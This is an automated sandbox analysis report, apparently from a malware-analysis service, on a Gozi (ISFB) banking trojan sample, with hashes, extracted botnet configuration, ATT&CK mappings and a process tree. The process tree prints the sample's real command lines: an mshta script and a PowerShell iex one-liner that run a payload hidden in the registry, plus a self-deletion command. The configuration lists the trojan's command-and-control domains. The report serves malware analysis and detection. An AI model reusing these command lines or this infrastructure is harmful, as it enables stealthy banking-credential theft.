gozi | 26dc3b58f57bf1d28e20374fcc13c33f3bc75bd753cf19afb617101f403f7b81

Analysis

max time kernel
150s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2023 09:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

287KB
MD5

bbf59fbbb9de660e113d82597c289cff
SHA1

85e3f40d8e5e5b93ef0e45e3cb5eec9dd19685be
SHA256

26dc3b58f57bf1d28e20374fcc13c33f3bc75bd753cf19afb617101f403f7b81
SHA512

8310447870f5de4ae575306391295f205d8ec0e3295f30e8b79e6d65a4e85ad408b0d07859e1c30294c843e5d23ca324d24fb20fe9ddb299dc4ad47d6a24cbfa
SSDEEP

3072:j6ya4jStntwsx48m71HMmJn0iZw6vK1ZRQxAgaX6wwrz+UTaBgfUd0:Q4gtTm7+mJnNZfK1ZRHRoJ

Score

10^/10

gozi 5050 banker dave isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

netsecurez.com

whofoxy.com

mimemoa.com

ntcgo.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral2/memory/2924-0-0x0000000000B50000-0x0000000000B5C000-memory.dmp	dave

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1004 set thread context of 3324	1004	powershell.exe	Explorer.EXE
PID 3324 set thread context of 3880	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 set thread context of 3768	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 set thread context of 4940	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 set thread context of 4884	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 set thread context of 2868	3324	Explorer.EXE	cmd.exe
PID 2868 set thread context of 3284	2868	cmd.exe	PING.EXE
PID 3324 set thread context of 1880	3324	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3284 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3284 PING.EXE

pid	process
3284	PING.EXE

pid	process
3284	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Client.exepowershell.exeExplorer.EXE

pid	process
2924	Client.exe
2924	Client.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3324 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

1004 powershell.exe
3324 Explorer.EXE
3324 Explorer.EXE
3324 Explorer.EXE
3324 Explorer.EXE
3324 Explorer.EXE
2868 cmd.exe
3324 Explorer.EXE

pid	process
3324	Explorer.EXE

pid	process
1004	powershell.exe
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
3324	Explorer.EXE
2868	cmd.exe
3324	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeShutdownPrivilege	3324	Explorer.EXE
Token: SeCreatePagefilePrivilege	3324	Explorer.EXE
Token: SeShutdownPrivilege	3324	Explorer.EXE
Token: SeCreatePagefilePrivilege	3324	Explorer.EXE
Token: SeShutdownPrivilege	3324	Explorer.EXE
Token: SeCreatePagefilePrivilege	3324	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3324 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3324 Explorer.EXE

pid	process
3324	Explorer.EXE

pid	process
3324	Explorer.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1848 wrote to memory of 1004	1848	mshta.exe	powershell.exe
PID 1848 wrote to memory of 1004	1848	mshta.exe	powershell.exe
PID 1004 wrote to memory of 3312	1004	powershell.exe	csc.exe
PID 1004 wrote to memory of 3312	1004	powershell.exe	csc.exe
PID 3312 wrote to memory of 2156	3312	csc.exe	cvtres.exe
PID 3312 wrote to memory of 2156	3312	csc.exe	cvtres.exe
PID 1004 wrote to memory of 3520	1004	powershell.exe	csc.exe
PID 1004 wrote to memory of 3520	1004	powershell.exe	csc.exe
PID 3520 wrote to memory of 3728	3520	csc.exe	cvtres.exe
PID 3520 wrote to memory of 3728	3520	csc.exe	cvtres.exe
PID 1004 wrote to memory of 3324	1004	powershell.exe	Explorer.EXE
PID 1004 wrote to memory of 3324	1004	powershell.exe	Explorer.EXE
PID 1004 wrote to memory of 3324	1004	powershell.exe	Explorer.EXE
PID 1004 wrote to memory of 3324	1004	powershell.exe	Explorer.EXE
PID 3324 wrote to memory of 3880	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3880	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3880	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3880	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3768	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3768	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3768	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 3768	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4940	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4940	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4940	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4940	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4884	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4884	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4884	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 4884	3324	Explorer.EXE	RuntimeBroker.exe
PID 3324 wrote to memory of 2868	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 2868	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 2868	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 2868	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 2868	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 1880	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 1880	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 1880	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 1880	3324	Explorer.EXE	cmd.exe
PID 2868 wrote to memory of 3284	2868	cmd.exe	PING.EXE
PID 2868 wrote to memory of 3284	2868	cmd.exe	PING.EXE
PID 2868 wrote to memory of 3284	2868	cmd.exe	PING.EXE
PID 2868 wrote to memory of 3284	2868	cmd.exe	PING.EXE
PID 2868 wrote to memory of 3284	2868	cmd.exe	PING.EXE
PID 3324 wrote to memory of 1880	3324	Explorer.EXE	cmd.exe
PID 3324 wrote to memory of 1880	3324	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3768

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3880

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3324

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2924

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnwu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnwu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smiwhwba -value gp; new-alias -name urlmtgun -value iex; urlmtgun ([System.Text.Encoding]::ASCII.GetString((smiwhwba "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q3se2vhf\q3se2vhf.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3312

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5DE.tmp" "c:\Users\Admin\AppData\Local\Temp\q3se2vhf\CSC4F69E34A8DBB46A48C4CCBA4AD0EEDE.TMP"
5⤵
PID:2156

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ank5eymn\ank5eymn.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB82F.tmp" "c:\Users\Admin\AppData\Local\Temp\ank5eymn\CSCD5A515E119D348ABB0DA6813BE9394.TMP"
5⤵
PID:3728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\Client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2868

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3284

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1880

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB5DE.tmp
Filesize
1KB

MD5
82a7375170f05ceff9e922f57486fdb5

SHA1
4628b7c488a842de2eef591ef44eec688f9aceba

SHA256
3c7d3bb4576e78f50b926d54ba5b33b85e7d2ff81ffc266cfbfcccdc5bd36999

SHA512
758c0c52fd81b8dd14ed9fcc33c89bdc3f2326973cb17f308c6b438202fecbd36e8d6846ffb8cc82bbed4c20eacce844fa8531a2219c74a2339bb456e71eb224

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB82F.tmp
Filesize
1KB

MD5
034043d79be68fca7153f95f08e8c685

SHA1
7767d4ef1073bdcd9b43823a9e7a487184a74461

SHA256
2111747379d5c911caf5c9d8b5db78bc9ca4be0de69f624829cf14bd738e1b1f

SHA512
82d0481eb7f51d5fcea7a9b54b5f20f24e3b1351ea0ac003f5663796fc95a74cfe45618ee01bf632b219b9698d3858e7d93bc6018ddc0e1a6165db321ebd7c09

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubemfdyz.vnr.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ank5eymn\ank5eymn.dll
Filesize
3KB

MD5
ad3963d69b45f77dd5ac509379262843

SHA1
b1e1118114583db85dde3083624092303c85e946

SHA256
27e570ec28382357f9600ac63c9d41de46501ee72a33e47070cad7b457c1f63f

SHA512
a9505d0b4548c34998ccb6c53660a2a9c433756cffed805572a59d081be7dfa949d6dcb86139680413fca06f680e0857edd259832eac167d952cf49beb0d9eb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\q3se2vhf\q3se2vhf.dll
Filesize
3KB

MD5
f475673bf7d9135c12e5c90c91e35051

SHA1
2d7ad6d86d5c70da6e2f1530580ac6dd612a3cbb

SHA256
16b80d3b05f77271d39a833a9206618c91222c04781aab2f155c62fec73d433f

SHA512
e3ce71edcd9744ca2fead11a728b6cd8dbf5f13fe89f2ae7567e2c8bed9e380075061672fb3ac8eab5d19f30490fa2d56690166c8dc8f7aa9986f7f31fdb3b61

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ank5eymn\CSCD5A515E119D348ABB0DA6813BE9394.TMP
Filesize
652B

MD5
b0026a2b60222a08039c26fa509d0f90

SHA1
1fed8149fcb8915c037d16690c56b01f35a08f9c

SHA256
c39d989a93c6ac479587faf2402dddb92c0f426c6569804c1c6db8a21cabeec0

SHA512
a5400225d26ff6793d1c0e4c9be2fb330c00875675b82a24022501d28771d422826b9a26e84be88266542ec6e329a3109a340fff7c01bd83cfb858863914cdff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ank5eymn\ank5eymn.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ank5eymn\ank5eymn.cmdline
Filesize
369B

MD5
2e29fc964766e4f4a0fd5cbc563b6e95

SHA1
954edd935064f82f2b177b4708cca1d1ecaccd13

SHA256
eacfcc77ec521e48460c784beee1060b90a07109b590bc52f1d69cca73516199

SHA512
eb81e49ff17b2da7b5f829bd57519aa583794bd8959d4e057ad49c8f0f96fb416eba3deee491f0b56cd8cc22362d7835b14ae98adcc392d96dad38e6afe75662

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q3se2vhf\CSC4F69E34A8DBB46A48C4CCBA4AD0EEDE.TMP
Filesize
652B

MD5
db95c8bef5a756668383c254cb1ce01a

SHA1
859c97549797f7008b9223291051fc8f3beb2364

SHA256
a6510bd47a49a6a5c9709fea699f22fc74fc4d5fc0070c17970916d60c27c82e

SHA512
5b3539382cbf39661a025b956c1642bdead30345f14248b1527083fa8ad3b8200f49a015cf0c3b83565654c03eeee7208f4e54ea45d23e1781ee64c8e7b57e5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q3se2vhf\q3se2vhf.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q3se2vhf\q3se2vhf.cmdline
Filesize
369B

MD5
5a7a077d684b41bd08f476e763b313da

SHA1
2ba7d4848690e6bf6b69d388ff46af195dea8893

SHA256
3c1adf2e8bb27eb8c99c9e82e6ae6ab8e08338a8cd719ba2703d0114cd9289e8

SHA512
b458396c17f6cfdbcef2dffc4118041cb686e533b0b0da9e16a54af6e6be23b9b41d8686fc13c386525081f3186d28dc8b773f19d0e39b84dac2364493b4ad7c

Download Submit
memory/1004-62-0x00007FFA54220000-0x00007FFA54CE1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-54-0x00000256325D0000-0x00000256325D8000-memory.dmp

Filesize
32KB

Download
memory/1004-26-0x0000025632160000-0x0000025632170000-memory.dmp

Filesize
64KB

Download
memory/1004-40-0x0000025632130000-0x0000025632138000-memory.dmp

Filesize
32KB

Download
memory/1004-25-0x00007FFA54220000-0x00007FFA54CE1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-15-0x0000025632100000-0x0000025632122000-memory.dmp

Filesize
136KB

Download
memory/1004-27-0x0000025632160000-0x0000025632170000-memory.dmp

Filesize
64KB

Download
memory/1004-70-0x00000256325E0000-0x000002563261D000-memory.dmp

Filesize
244KB

Download
memory/1004-69-0x00007FFA54220000-0x00007FFA54CE1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-56-0x00000256325E0000-0x000002563261D000-memory.dmp

Filesize
244KB

Download
memory/1880-115-0x0000000001420000-0x00000000014B8000-memory.dmp

Filesize
608KB

Download
memory/1880-113-0x0000000000BF0000-0x0000000000BF1000-memory.dmp

Filesize
4KB

Download
memory/1880-107-0x0000000001420000-0x00000000014B8000-memory.dmp

Filesize
608KB

Download
memory/2868-97-0x000001E021740000-0x000001E0217E4000-memory.dmp

Filesize
656KB

Download
memory/2868-119-0x000001E021740000-0x000001E0217E4000-memory.dmp

Filesize
656KB

Download
memory/2868-98-0x000001E021620000-0x000001E021621000-memory.dmp

Filesize
4KB

Download
memory/2924-1-0x0000000000B60000-0x0000000000B6F000-memory.dmp

Filesize
60KB

Download
memory/2924-0-0x0000000000B50000-0x0000000000B5C000-memory.dmp

Filesize
48KB

Download
memory/2924-5-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/2924-11-0x0000000000BD0000-0x0000000000BDD000-memory.dmp

Filesize
52KB

Download
memory/3284-105-0x00000274A95A0000-0x00000274A9644000-memory.dmp

Filesize
656KB

Download
memory/3284-106-0x00000274A93A0000-0x00000274A93A1000-memory.dmp

Filesize
4KB

Download
memory/3284-118-0x00000274A95A0000-0x00000274A9644000-memory.dmp

Filesize
656KB

Download
memory/3324-58-0x0000000008B20000-0x0000000008BC4000-memory.dmp

Filesize
656KB

Download
memory/3324-95-0x0000000008B20000-0x0000000008BC4000-memory.dmp

Filesize
656KB

Download
memory/3324-59-0x0000000002930000-0x0000000002931000-memory.dmp

Filesize
4KB

Download
memory/3768-111-0x0000018D9E870000-0x0000018D9E914000-memory.dmp

Filesize
656KB

Download
memory/3768-79-0x0000018D9E830000-0x0000018D9E831000-memory.dmp

Filesize
4KB

Download
memory/3768-78-0x0000018D9E870000-0x0000018D9E914000-memory.dmp

Filesize
656KB

Download
memory/3880-73-0x000001BFC59C0000-0x000001BFC59C1000-memory.dmp

Filesize
4KB

Download
memory/3880-102-0x000001BFC5C00000-0x000001BFC5CA4000-memory.dmp

Filesize
656KB

Download
memory/3880-72-0x000001BFC5C00000-0x000001BFC5CA4000-memory.dmp

Filesize
656KB

Download
memory/4884-117-0x000001D23D010000-0x000001D23D0B4000-memory.dmp

Filesize
656KB

Download
memory/4884-91-0x000001D23CFD0000-0x000001D23CFD1000-memory.dmp

Filesize
4KB

Download
memory/4884-89-0x000001D23D010000-0x000001D23D0B4000-memory.dmp

Filesize
656KB

Download
memory/4940-85-0x000001CC3B5E0000-0x000001CC3B5E1000-memory.dmp

Filesize
4KB

Download
memory/4940-83-0x000001CC3D8B0000-0x000001CC3D954000-memory.dmp

Filesize
656KB

Download
memory/4940-116-0x000001CC3D8B0000-0x000001CC3D954000-memory.dmp

Filesize
656KB

Download